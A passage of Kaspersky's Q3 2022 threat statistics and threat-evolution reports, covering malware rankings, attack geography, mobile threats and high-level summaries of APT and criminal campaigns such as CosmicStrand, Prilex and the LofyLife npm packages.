The remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.

Attacks on macOS

The third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries.  In particular, researchers found Operation In(ter)ception, a campaign operated by North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.

CloudMensis, a spy program written in Objective-C, used cloud storage services as C&C servers and shared several characteristics with the RokRAT Windows malware operated by ScarCruft.

The creators of XCSSET adapted their toolset to macOS Monterey and migrated from Python 2 to Python 3.

In Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake VPN application and fake Salesforce updates, both built on the Sliver framework.

In addition to this, researchers announced a new multi-platform find: the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.

TOP 20 threats for macOS Verdict %* 1 AdWare.OSX.Amc.e 14.77 2 AdWare.OSX.Pirrit.ac 10.45 3 AdWare.OSX.Agent.ai 9.40 4 Monitor.OSX.HistGrabber.b 7.15 5 AdWare.OSX.Pirrit.j 7.10 6 AdWare.OSX.Bnodlero.at 6.09 7 AdWare.OSX.Bnodlero.ax 5.95 8 Trojan-Downloader.OSX.Shlayer.a 5.71 9 AdWare.OSX.Pirrit.ae 5.27 10 Trojan-Downloader.OSX.Agent.h 3.87 11 AdWare.OSX.Bnodlero.bg 3.46 12 AdWare.OSX.Pirrit.o 3.32 13 AdWare.OSX.Agent.u 3.13 14 AdWare.OSX.Agent.gen 2.90 15 AdWare.OSX.Pirrit.aa 2.85 16 Backdoor.OSX.Twenbc.e 2.85 17 AdWare.OSX.Ketin.h 2.82 18 AdWare.OSX.Pirrit.gen 2.69 19 Trojan-Downloader.OSX.Lador.a 2.52 20 Downloader.OSX.InstallCore.ak 2.28

* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked.

As usual, our TOP 20 ranking for biggest threats encountered by users of Kaspersky security solutions for macOS were dominated by adware. AdWare.OSX.Amc.e, touted as “Advanced Mac Cleaner,” had taken the top place for a second quarter in a row. This application displays fake system issue messages, offering to buy the full version to fix those. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.

Geography of threats for macOS

TOP 10 countries and territories by share of attacked users

Country or territory* %** 1 France 1.71 2 Canada 1.70 3 Russia 1.57 4 India 1.53 5 United States 1.52 6 Spain 1.48 7 Australia 1.36 8 Italy 1.35 9 Mexico 1.27 10 United Kingdom 1.24

* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000).
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

France, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.

IoT attacks IoT threat statistics

In Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.

Telnet 75.92% SSH 24.08%

Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022

A majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.

Telnet 97.53% SSH 2.47%

Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022

TOP 10 threats delivered to IoT devices via Telnet

Verdict %* 1 Backdoor.Linux.Mirai.b 28.67 2 Trojan-Downloader.Linux.NyaDrop.b 18.63 3 Backdoor.Linux.Mirai.ba 11.63 4 Backdoor.Linux.Mirai.cw 10.94 5 Backdoor.Linux.Gafgyt.a 3.69 6 Backdoor.Linux.Mirai.ew 3.49 7 Trojan-Downloader.Shell.Agent.p 2.56 8 Backdoor.Linux.Gafgyt.bj 1.63 9 Backdoor.Linux.Mirai.et 1.17 10 Backdoor.Linux.Mirai.ek 1.08

* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats.

Detailed IoT-threat statistics are published in the DDoS report for Q3 2022.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums.

Countries and territories that serve as sources of web-based attacks: TOP 10

The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted.

In Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.

Distribution of web-attack sources country and territory, Q3 2022 (download)

Countries and territories where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.

Note that these rankings only include attacks by malicious objects that fall under the Malware class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

Country or territory* %** 1 Taiwan 19.65 2 Belarus 17.01 3 Serbia 15.05 4 Russia 14.12 5 Algeria 14.01 6 Turkey 13.82 7 Tunisia 13.31 8 Bangladesh 13.30 9 Moldova 13.22 10 Palestine 12.61 11 Yemen 12.58 12 Ukraine 12.25 13 Libya 12.23 14 Sri Lanka 11.97 15 Kyrgyzstan 11.69 16 Estonia 11.65 17 Hong Kong 11.52 18 Nepal 11.52 19 Syria 11.39 20 Lithuania 11.33

* Excluded are countries and territories with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

On average during the quarter, 9.08% of internet users’ computers worldwide were subjected to at least one Malware-class web attack.

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

In Q3 2022, our File Anti-Virus detected 49,275,253 malicious and potentially unwanted objects.

Countries and territories where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

These rankings only include attacks by malicious programs that fall under the Malware class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country or territory* %** 1 Turkmenistan 46.48 2 Yemen 45.12 3 Afghanistan 44.18 4 Cuba 40.48 5 Tajikistan 39.17 6 Bangladesh 37.06 7 Uzbekistan 37.00 8 Ethiopia 36.96 9 South Sudan 36.89 10 Myanmar 36.64 11 Syria 34.82 12 Benin 34.56 13 Burundi 33.91 14 Tanzania 33.05 15 Rwanda 33.03 16 Chad 33.01 17 Venezuela 32.79 18 Cameroon 32.30 19 Sudan 31.93 20 Malawi 31.88

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

On average worldwide, Malware-class local threats were registered on 14.74% of users’ computers at least once during Q3. Russia scored 16.60% in this ranking.

IT threat evolution in Q3 2022. Mobile statistics

18 Listopad, 2022 - 09:05

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q3 2022:

  • A total of 5,623,670 mobile malware, adware, and riskware attacks were blocked.
  • Droppers (Trojan-Dropper), accounting for 26.28% of detections, were the most common threat to mobile devices.
  • 438,035 malicious installation packages were detected, of which:
    • 35,060 packages were related to mobile banking Trojans,
    • 2,310 packages were mobile ransomware Trojans.
Quarterly highlights

Judging by the number of attacks on mobile devices, cybercriminal activity stabilized in Q3 2022 after a gradual drop in the previous quarters. Over the three months, Kaspersky products prevented a total of 5.6 million mobile malware, adware, and riskware attacks.

Number of attacks targeting users of Kaspersky mobile solutions, Q1 2021 — Q3 2022 (download)

The new Triada Trojan, discovered inside a modified WhatsApp build, was an interesting find. It was notable for spreading via ads inside the popular Snaptube app and through the Vidmate internal store. Once on a device, the Trojan decrypts and runs a payload, which downloads and runs further malicious modules. The modules can display ads, subscribe the user to paid services, or download and run other malicious modules. Besides that, the Trojan steals various keys from the legitimate WhatsApp, potentially hijacking the account.

The Harly Trojan subscribers were another malware family spread via legitimate channels. These are published in Google Play under the guise of authentic apps, subscribing the unknowing user to paid services once installed. We have discovered 200 malicious applications of this type starting in 2020, and a total count of installations at the time of writing this report had exceeded 5 million.

One of the most recently detected Harly-type apps in Google Play, with more than 50,000 installations.

Google Play keeps getting new banking Trojans, such as new versions of the Trojan dropper that downloads and runs Sharkbot.

Despite a general decline in the number of mobile attacks, we can see that cybercriminals are using increasingly smarter tricks to deliver malware to user devices.

Mobile threat statistics

In Q3 2022, Kaspersky detected 438,035 malicious installation packages, which is 32,351 more than in the previous quarter and down 238,155 against Q3 2021.

Number of detected malicious installation packages, Q3 2021 — Q3 2022 (download)

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type, Q2 and Q3 2022 (download)

Threats in the Trojan-Dropper class ranked first among all threats detected in Q3, with 26.28%, exceeding the previous quarter’s figure by 22.15 percentage points. Nearly half (45.33%) of all detected threats of that type belonged to the Ingopack family. These were followed by banking Trojan droppers from Wroba (41.24%) and Hqwar families (5.98%).

AdWare, the ex-leader, moved 2.5 percentage points down the rankings to second place with a share of 22.78%. A fourth of all detected threats of that class belonged to the Aldo family (25.64%).

Third place was taken by various Trojans with a cumulative share of 16.01%, which was 4.48 percentage points lower than in the previous quarter. Half of all detected threats of that class were objects from the Boogr family (50.16%).

Top 20 mobile malware programs

Note that the malware rankings below exclude riskware or PUAs, such as RiskTool or adware.

Verdict %* 1 DangerousObject.Multi.Generic 22.58 2 Trojan.AndroidOS.Generic 14.59 3 Trojan-Spy.AndroidOS.Agent.aas 8.51 4 Trojan-SMS.AndroidOS.Fakeapp.d 6.95 5 Trojan.AndroidOS.GriftHorse.l 5.57 6 Trojan-Dropper.AndroidOS.Hqwar.hd 2.94 7 DangerousObject.AndroidOS.GenericML 2.90 8 Trojan-Dropper.AndroidOS.Wroba.o 2.46 9 Trojan-Dropper.AndroidOS.Agent.sl 2.21 10 Trojan-Downloader.AndroidOS.Necro.d 1.93 11 Trojan-Dropper.AndroidOS.Agent.rv 1.84 12 Trojan-Banker.AndroidOS.Bian.h 1.71 13 Trojan-Downloader.AndroidOS.Agent.kx 1.69 14 Trojan-Dropper.AndroidOS.Hqwar.hc 1.66 15 Trojan.AndroidOS.Hiddad.hh 1.52 16 Trojan.AndroidOS.GriftHorse.ah 1.45 17 Trojan-SMS.AndroidOS.Agent.ado 1.41 18 Trojan-Dropper.AndroidOS.Hqwar.gen 1.39 19 Trojan-Dropper.AndroidOS.Triada.az 1.35 20 Trojan.AndroidOS.Soceng.f 1.33

* Unique users attacked by this malware as a percentage of all attacked users of Kaspersky mobile solutions.

First and second places went to DangerousObject.Multi.Generic (22.58%) and Trojan.AndroidOS.Generic (14.59%), respectively, which are verdicts we use for malware detected with cloud technology. Cloud technologies are used when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is essentially how the latest malware types are detected.

Trojan-Spy.AndroidOS.Agent.aas (8.51%), an evil twin of WhatsApp with a spy module built in, rose to third position. Trojan-SMS.AndroidOS.Fakeapp.d slid from second to fourth place with 6.95%. This malware is capable of sending text messages and calling predefined numbers, displaying ads and hiding its icon. Members of the Trojan.AndroidOS.GriftHorse family, which subscribe the user to premium SMS services, took fifth and sixteenth places.

Malware from the Trojan-Dropper.AndroidOS.Hqwar family, used for unpacking and running various banking Trojans, occupied sixth, fourteenth, and eighteenth places. These attacked a combined 6% of all users who encountered malware.

The verdict of DangerousObject.AndroidOS.GenericML came seventh with 2.90%. This verdict is assigned to files recognized as malicious by our machine-learning systems. Eighth place was occupied by Trojan-Dropper.AndroidOS.Agent.sl (2.46%), a dropper that unpacks and runs the banking Trojan from the Roaming Mantis campaign. Roaming Mantis mainly attacks users in Japan and France. Another banking Trojan dropper, Trojan-Dropper.AndroidOS.Agent.sl, sunk to ninth place with 2.21%.

Trojan-Downloader.AndroidOS.Necro.d, used for downloading and running other forms of malware on infected devices, jumped from sixteenth to tenth place with 1.93%. Trojan-Dropper.AndroidOS.Agent.rv, a dropper that unpacks and runs various types of malware, took eleventh place with 1.84%.

Twelfth place saw the arrival of the banking Trojan, Trojan-Banker.AndroidOS.Bian.h, with 1.71%. Trojan-Downloader.AndroidOS.Agent.kx, an adware dropper, accounted for 1.69%, climbed from twentieth to thirteenth place. Trojan.AndroidOS.Hiddad.hh, an adware Trojan that mostly attacks users in Russia, Kazakhstan, and Ukraine, was fifteenth with 1.52%.

Trojan-SMS.AndroidOS.Agent.ado, known for sending text messages to premium-rate shortcodes, remained seventeenth with 1.41%. Nineteenth place, with 1.35%, was occupied by Trojan-Dropper.AndroidOS.Triada.az, a type of malware that decrypts and runs a payload capable of displaying ads on the lock screen, opening new browser tabs, gathering device information, and dropping other malicious code.

The last in the rankings (previously thirteenth) is Trojan.AndroidOS.Soceng.f with 1,33%. It sends text messages to the user’s contacts, deletes files on the memory card, and overlays the interfaces of popular apps with its own window.

Geography of mobile threats

TOP 10 countries and territories by share of users attacked by mobile malware

Countries and territories* %** 1 Iran 81.37 2 Yemen 18.91 3 Saudi Arabia 12.68 4 Oman 11.99 5 Algeria 11.93 6 Kenya 11.42 7 Nigeria 10.72 8 India 10.65 9 Egypt 9.39 10 Ecuador 8.66

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 10,000) have been excluded from the rankings.
** Unique users attacked as a percentage of all users of Kaspersky mobile security solutions in the country.

The countries with the largest shares of attacked users and the most widespread threats in these regions remained unchanged in Q3 2022.

Iran came first with a record 81.37%, still plagued by the annoying adware modules from the AdWare.AndroidOS.Notifyer and AdWare.AndroidOS.Fyben families. Yemen, where users were attacked mostly by Trojan-Spy.AndroidOS.Agent.aas, stayed at second place with 18,91%. In Saudi Arabia, which came third with 12.68%, users most commonly encountered adware from the AdWare.AndroidOS.Adlo and AdWare.AndroidOS.Fyben families.

Mobile banking Trojans

The number of detected installation packages for mobile banking Trojans dropped to 35,060. This figure represents a decrease of 20,554 from Q2 2022, but a decrease of 22,963 from Q3 2021.

Two-thirds (66.20%) of the detected banking Trojan installation packages belonged to the Trojan-Banker.AndroidOS.Bray family. These were followed by Trojan-Banker.AndroidOS.Bian with 5,46% and Trojan-Banker.AndroidOS.Fakecalls with 4,59%.

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2021 — Q3 2022 (download)

Top 10 most common mobile bankers

Verdict %* 1 Trojan-Banker.AndroidOS.Bian.h 29.61 2 Trojan-Banker.AndroidOS.Anubis.t 10.67 3 Trojan-Banker.AndroidOS.Svpeng.q 7.72 4 Trojan-Banker.AndroidOS.Gustuff.d 5.35 5 Trojan-Banker.AndroidOS.Asacub.ce 4.18 6 Trojan-Banker.AndroidOS.Agent.eq 3.94 7 Trojan-Banker.AndroidOS.Agent.ep 3.21 8 Trojan-Banker.AndroidOS.Agent.cf 2.51 9 Trojan-Banker.AndroidOS.Faketoken.z 2.12 10 Trojan-Banker.AndroidOS.Hqwar.t 2.08

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

The three most-attacked countries in terms of affected users remained the same as in Q2 2022.

Geography of mobile bankers

TOP 10 countries and territories by shares of users attacked by mobile banking Trojans

Countries and territories* %** 1 Saudi Arabia 1.36 2 Spain 1.05 3 Australia 0.79 4 Turkey 0.41 5 Switzerland 0.20 6 Japan 0.11 7 France 0.08 8 Colombia 0.08 9 South Korea 0.07 10 Italy 0.04

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 10,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Saudi Arabia had the largest share (1.36%) of unique users who came across mobile financial threats in Q3 2022. Trojan-Banker.AndroidOS.Bian.h accounted for more than 99% of attacks in that country. Spain, formerly the hardest-hit country, had the second largest share (1.05%), with 93.46% of attacks linked to the same malware type. Australia again had the third-largest (0.79%) share, with 98.27% of attacks there involving Trojan-Banker.AndroidOS.Gustuff.d.

Mobile ransomware Trojans

We detected 2,310 mobile Trojan ransomware installers in Q3 2022, a decrease of 1,511 from Q2 2022 and a decrease of 3,847 year on year.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky, Q3 2021 — Q3 2022 (download)

Top 10 most common mobile ransomware

Verdict %* 1 Trojan-Ransom.AndroidOS.Pigetrl.a 58.73 2 Trojan-Ransom.AndroidOS.Small.as 4.52 3 Trojan-Ransom.AndroidOS.Rkor.cw 4.17 4 Trojan-Ransom.AndroidOS.Rkor.cl 1.92 5 Trojan-Ransom.AndroidOS.Fusob.h 1.92 6 Trojan-Ransom.AndroidOS.Rkor.cm 1.60 7 Trojan-Ransom.AndroidOS.Rkor.da 1.60 8 Trojan-Ransom.AndroidOS.Rkor.bi 1.60 9 Trojan-Ransom.AndroidOS.Rkor.cx 1.57 10 Trojan-Ransom.AndroidOS.Small.ce 1.32

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

Geography of mobile ransomware

TOP 10 countries and territories by share of users attacked by mobile ransomware Trojans

Countries and territories* %** 1 Yemen 0.28 2 Kazakhstan 0.15 3 Saudi Arabia 0.02 4 Jordan 0.02 5 Switzerland 0.02 6 Azerbaijan 0.01 7 Kyrgyzstan 0.01 8 Egypt 0.01 9 Iran 0.01 10 Algeria 0.01

* Excluded from the rankings are countries and territories with relatively few (under 10,000) Kaspersky mobile security users.
** Unique users attacked by ransomware Trojans as a percentage of all Kaspersky mobile security solution users in the country or territory.

Yemen (0.28%), Kazakhstan (0.15%) and Saudi Arabia (0.02%) had the largest shares of users attacked by mobile ransomware Trojans. Users in Yemen and Saudi Arabia most often encountered Trojan-Ransom.AndroidOS.Pigetrl.a, while users in Kazakhstan were attacked mainly by members of the Trojan-Ransom.AndroidOS.Rkor family.

IT threat evolution Q3 2022

18 Listopad, 2022 - 09:00

Targeted attacks CosmicStrand:  discovery of a sophisticated UEFI rootkit

In July, we reported a rootkit that we found in modified Unified Extensible Firmware Interface (UEFI) firmware, the code that loads and initiates the boot process when the computer is turned on. Rootkits are malware implants that are installed deep in the operating system. Difficult to detect, they ensure that a computer remains infected even if someone reinstalls the operating system or replaces the hard drive. However, they aren’t easy to create: the slightest programming error could crash the machine. Nevertheless, in our APT predictions for 2022, we noted that more attackers would reach the sophistication level required to develop such tools.

The main purpose of CosmicStrand is to download a malicious program at startup, which then performs the tasks set by the attackers. Having successfully passed through all stages of the boot process, the rootkit eventually runs a shell code and contacts the attackers’ C2 (Command-and-Control) server, from which it receives a malicious payload.

We were unable to intercept the file received by the rootkit from the C2 server. However, on one of the infected machines, we found malware that we think is probably related to CosmicStrand. This malware creates a user named “aaaabbbb” in the operating system with local administrator rights.

We identified targets of CosmicStrand, which we attribute to an unknown Chinese-speaking threat actor, in China, Vietnam, Iran and Russia. All of them were ordinary people using our free antivirus solution, seemingly unconnected with any organization of interest to a sophisticated attacker of this kind. It also turned out that the motherboards infected in all known cases came from just two manufacturers. Therefore, it’s likely that the attackers found some common vulnerability in these motherboards that made UEFI infection possible.

It’s also unclear how the attackers managed to deliver the malware. It’s possible that the attackers are able to infect UEFI remotely. Or that those infected had purchased a modified motherboard from a reseller.

Andariel deploys DTrack and Maui ransomware

On 6 July, the US CISA (Cybersecurity and Infrastructure Security Agency) published an alert in which they accused North Korean state-sponsored threat actors of using the Maui ransomware to target the US healthcare sector. While CISA offered nothing to substantiate its attribution, we determined that approximately 10 hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the same target, preceded by deployment of the 3proxy tool months earlier. We believe that this helps to solidify the attribution to the Korean-speaking APT Andariel (aka Silent Chollima and Stonefly), with low-to-medium confidence.

Andariel’s primary tool is DTrack, used to collect information about the target, send it to a remote host and, in the case of the variant used in these attacks, store it on a remote host in the target network. When the attackers find noteworthy data, the Maui ransomware is deployed – it is typically detected on targeted hosts 10 hours after the activation of DTrack.

The attackers also use another tool, called 3Proxy, to maintain remote access to the compromised computer.

To infect target systems, the attackers exploit unpatched versions of public online services. In one such case, the malware was downloaded from an HFS (HTTP file server): the attackers used an unknown exploit that enabled them to run a PowerShell script from a remote server. In another, they were able to compromise a WebLogic server through an exploit for the CVE-2017-10271 vulnerability, which ultimately allowed them to run a script.

Our research revealed that, rather than just focusing on a particular industry, Andariel is ready to attack any company. We detected at least one attack on a housing company in Japan, as well as several targets in India, Vietnam and Russia.

VileRAT:  DeathStalker’s continuous strike at foreign and crypto-currency exchanges

In late August 2020, we published an overview of DeathStalker and its activities, including the Janicab, Evilnum and PowerSing campaigns. Later that year, we documented the PowerPepper campaign. We believe DeathStalker to be a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support competitive and financial intelligence efforts. Meanwhile, in August 2020, we also released a private report on VileRAT for our threat intelligence customers. VileRAT is a Python implant, part of an evasive and highly intricate attack campaign against foreign exchange and cryptocurrency trading companies. We discovered it in Q2 2020 as part of an update of Evilnum, and attributed it to DeathStalker.

Since we first identified it, DeathStalker has continuously updated and used its VileRAT tool-chain against the same type of targets.

The threat actor has also sought to escape detection. However, the VileRAT campaign took this to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign we have ever identified from DeathStalker. From state-of-the-art obfuscation with VBA and JavaScript, to multi-layered and low-level packing with Python, a robust multi-stage in-memory PE loader and security vendor-specific heuristic bypasses – the threat actor has left nothing to chance. On top of this, DeathStalker has developed a vast and quickly changing infrastructure as well.

On the other side, there are some glitches and inconsistencies. VileRAT, the final payload in the tool-chain is more than 10MB in size. The group uses simple infection vectors, many suspicious communication patterns, noisy and easy-to-identify process executions or file deployments, as well as sketchy development practices leaving bugs that require frequent implant updates.  For these reasons, an effective endpoint solution will still be able to detect and block most VileRAT-related malicious activities.

Using only data that we could verify with our own telemetry, we identified 10 organizations compromised or targeted by DeathStalker since 2020 – in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the UAE and the Russian Federation.

We do not know what DeathStalker’s principal intention is in targeting these organizations: this could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding customers to bypass sanctions and/or spying on targets’ customers. However, it does not appear to be direct financial gain.

Kimsuky’s GoldDragon cluster and C2 operations

Kimsuky is a prolific and active threat actor primarily targeting North Korea-related entities. Like other sophisticated adversaries, this group updates its tools frequently. We recently had the chance to investigate how the threat actor configures its GoldDragon cluster and what kind of tricks it uses to confirm and further validate its victims. The Kimsuky group has configured multi-stage C2 servers with various commercial hosting services located around the world.

The attacks occur in several stages. First, the threat actor sends a spear-phishing email to the potential victim with a lure to download additional documents. If the victim clicks the link, it results in a connection to the first-stage C2 server, with an email address as a parameter. The first-stage C2 server verifies that the incoming email address parameter is expected and delivers the malicious document if it’s in the target list. The first-stage script also forwards the victim’s IP address to the next-stage server. When the fetched document is opened, it connects to the second C2 server. The corresponding script on the second C2 server checks the IP address forwarded from the first-stage server to verify that it’s an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not. On top of that, the operator relies on several other processes to carefully deliver the next payload. Another C2 script on the second C2 server checks the operating system type and predefined user-agent strings to filter out requests from security researchers or auto-analysis systems.

Based on the contents of the decoy document, we hypothesize that the targets of this operation are people or entities related to political or diplomatic activities. We know that historically politicians, diplomats, journalists, professors and North Korean defectors have been prime targets of the Kimsuky group. The email address names from the C2 scripts help to confirm this hypothesis.

Our research underlines how Kimsuky pays close attention to validating its victims and delivering the next-stage payloads to them, while taking steps to make analysis difficult.

Targeted attacks on industrial enterprises

In August, Kaspersky ICS CERT experts reported a wave of targeted attacks on military industrial complex enterprises and public institutions in Belarus, Russia, Ukraine and Afghanistan. The attacks, which took place earlier this year, affected industrial plants, design bureaus and research institutes, government agencies, ministries and departments. We identified more than a dozen targets, and observed significant overlaps in TTPs (Tactics, Techniques and Procedures) with the threat actor TA428.

The attackers gained access to the enterprise network using carefully crafted phishing emails. Some of the information they contained is not publicly available, indicating that the attackers conducted reconnaissance ahead of the attack, possibly using information obtained in earlier attacks on the target organization or others associated with the target. Microsoft Word documents attached to the phishing emails contained malicious code that exploits the CVE-2017-11882 vulnerability, which enables an attacker to execute arbitrary code – in this case, the main module of the PortDoor backdoor – without any additional user action.

The attackers used five different backdoors at the same time – probably for redundancy. They provide extensive functionality for controlling infected systems and collecting confidential data. Once they have gained initial access, the attackers attempt to spread to other computers on the network. Once they have obtained domain administrator privileges, they search for, and exfiltrate, sensitive data to their servers hosted in different countries – these servers are also used as first-stage C2 servers. The attackers compress stolen files into encrypted and password-protected ZIP archives. After receiving the data, the first-stage C2 servers forward the archives to a second-stage server located in China.

Other malware Prilex: the pricey prickle credit card complex

Prilex, active since 2014, is a well-known threat actor targeting ATMs and Point of Sale (PoS) terminals. In 2016, the group began to focus all its activities on PoS systems. Since then the group has greatly improved its malware: it develops complex threats and poses a major threat to the payment chain. Prilex is now conducting so-called “GHOST” attacks – fraudulent transactions using cryptograms, which are pre-generated by the victim’s card during the store payment process.

The group delivers its malware using social engineering. The cybercriminals call their chosen target and tell them their PoS software needs to be updated by a technician. Later, the fake technician goes to the targeted company in person and infects the machines. Alternatively, they persuade the target to install AnyDesk and use this to install the malware remotely.

Prior to striking victims, the cybercriminals perform an initial screening of the machine, in order to check the number of transactions that have already taken place and whether this target is worth attacking. If so, the malware captures any running transaction and modifies its content in order to be able to capture the card information. All the captured card details are then saved to an encrypted file, which is later sent to the attackers’ server, allowing them to make transactions through a fraudulent PoS device registered in the name of a fake company.

Having attacked one PoS system, the cybercriminals obtain data from dozens, or even hundreds, of cards daily. It is especially dangerous if the infected machines are located in popular shopping malls in densely populated cities, where the daily flow of customers can reach thousands of people.

In our recent investigation, we discovered that the Prilex group is controlling the development lifecycle of its malware using Subversion – used by professional development teams. Moreover, there is also a supposed official Prilex website selling its malware kits to other cybercriminals as Malware-as-a-Service (MaaS). Prilex has previously sold various versions of its malware on the dark web, for example, in 2019 a German bank lost more than €1.5 million in a similar attack by the Prilex malware. The development of its MasS operation means that highly sophisticated and dangerous PoS malware could spread to many countries, increasing the risk of multimillion-dollar losses for businesses all around the world.

We also discovered web sites and Telegram chats where cybercriminals sell Prilex malware. Posing as the Prilex group itself, they offer the latest versions of PoS malware, costing from $3,500 to $13,000. We are not sure about the real ownership of these web sites, as they could be copycats.

Luna and Black Basta: new ransomware for Windows, Linux and ESXi

Ransomware groups have increasingly targeted not only Windows computers, but also Linux devices and ESXi virtual machines. We highlighted one example earlier this year – the BlackCat gang, which distributes malware written in the cross-platform language Rust. We recently analyzed two other malware families that provide similar functionality: Black Basta and Luna.

Black Basta, first discovered in February, exists in versions for Windows and for Linux – the latter primarily targeting ESXi virtual machine images. One of the key features of the Windows version is that it boots the system in Safe Mode before encrypting data: this allows the malware to evade detection by security solutions, many of which don’t work in Safe Mode.

At the time we published our report, Black Basta operators had released information on 40 victims, among them manufacturing and electronics firms, contractors, and others, located in the US, Australia, Europe, Asia and Latin America.

Luna, discovered in June and also written in Rust, is able to encrypt both Windows and Linux devices, as well as ESXi virtual machine images. In an advert on the dark web, the cybercriminals claim to co-operate only with Russian-speaking partners. This means that the targets of interest to the attackers are most likely located outside the former Soviet Union. This is also borne out by the fact that the ransom note embedded into the code of the ransomware is written in English, albeit with mistakes.

Malicious packages in online code repositories

In July, we reported a malicious campaign that we named LofyLife. Using our internal automated system for monitoring open-source repositories, our researchers identified four malicious packages spreading Volt Stealer and Lofy Stealer malware in the npm repository.

The identified malicious packages appeared to be used for ordinary tasks such as formatting headlines or certain gaming functions. The “formatting headlines” package was in Brazilian Portuguese with a “#brazil” hashtag, suggesting that the attackers were seeking to target people based in Brazil. Other packages were presented in English, so they could be targeting users from other countries.

The packages contained highly obfuscated malicious JavaScript and Python code. This made them harder to analyze when being uploaded to the repository. The malicious payload consisted of malware written in Python dubbed Volt Stealer – an open-source malicious script – and JavaScript malware dubbed Lofy Stealer. Volt Stealer was used to steal Discord tokens from infected machines, along with the victim’s IP address, and upload them via HTTP. Lofy Stealer infects Discord client files and monitors the victim’s actions, detecting when a person logs in, changes the registered email or password, enables or disables multi-factor authentication and adds new payment methods (in which case the malware steals full credit card details). It uploads collected information to a remote endpoint.

The npm repository is an open-source home for JavaScript developers to share and reuse code for building various web applications. As such, it represents a significant supply chain that, if exploited by attackers, can be used to deliver malware to many people. This is not the first time we’ve seen an npm package poisoned in this way.

npm is not the only such code repository to have been targeted recently. In August, Check Point published a report on 10 malicious Python packages in the Python Package Index (PyPI), the most popular Python repository among software developers. The malicious packages were intended to steal developers’ personal data and credentials. Following this research, we discovered two other malicious Python packages in the PyPI, masquerading as one of the most popular open-source packages named “requests“.

The attacker used a description of the legitimate “requests” package in order to trick victims into installing a malicious one. In addition, the description contained fake statistics and the project description referenced the web pages of the original “requests” package, as well as the author’s email. All mentions of the legitimate package’s name were replaced with the name of the malicious one.

Cyberthreats facing gamers

The gaming industry is huge and growing. The industry attracts an audience of more than 3 billion people worldwide – a huge pool of potential victims for cybercriminals who target this sector. Cybercriminals make extensive use of social engineering tricks to entice potential victims into installing malware: the promise of an Android version of a game that’s not on Google Play; the chance to play games for free; access to game cheats; etc.

We recently published our report on gaming-related threats in 2021–22. Here are some of the key headlines:

  • In the year up to June 2022, Kaspersky blocked gaming-related malware and unwanted software on the computers of 384,224 people, with 91,984 files distributed under the guise of 28 games.
